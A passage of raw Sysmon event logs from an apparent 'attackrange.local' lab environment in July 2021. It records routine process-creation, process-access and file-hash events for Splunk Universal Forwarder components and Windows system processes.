Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.623{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D6C090940751E8CC4AD3A0BFA65E00C,SHA256=2195244BD23F51881258F5E7995E17E6BBE8A8ADD2D24679CE5DB6BB8C6BE0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ED9EEB5EA99F0F0253011651D9FAA42,SHA256=2A37F9C1FB0401BD6ACCE0B88B89043061F1F2860621FC11000EBA0DB1981C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.388{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94097294352F5F82B323EA6DB064AF0D,SHA256=F15F37255D1377D085D2F974226604D808626C828E6D5DA9587FA6669B7D51C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:25.077{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CBE1EE1CD4DC60029393FB25F9FAE53,SHA256=93904EA23221318BDF24E107F749BE6F46364A3031396C86A20898348491D9D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.622{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D6C090940751E8CC4AD3A0BFA65E00C,SHA256=2195244BD23F51881258F5E7995E17E6BBE8A8ADD2D24679CE5DB6BB8C6BE0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8CDE4E34D435ED5696986BE524E8591,SHA256=5C44173FBEF42C98A769E7BAC7A5CC803A5F2BCF38C0BFDD58B6D736D452D728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:26.110{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82C44696431A81D451EA42E033286C8,SHA256=91338715517774137763B423D5EEF366D745CE89E47DAA04680CCE8A923E0F5A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:26.325{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.325{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.309{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.310{0C1E0330-F406-60EB-6179-00000000D001}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.825{0C1E0330-F407-60EB-6379-00000000D001}24521424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F407-60EB-6379-00000000D001}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:27.700{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 